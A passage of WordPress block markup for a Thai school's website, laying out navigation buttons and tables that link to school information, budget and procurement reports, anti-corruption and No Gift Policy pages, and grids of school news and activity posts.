{\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%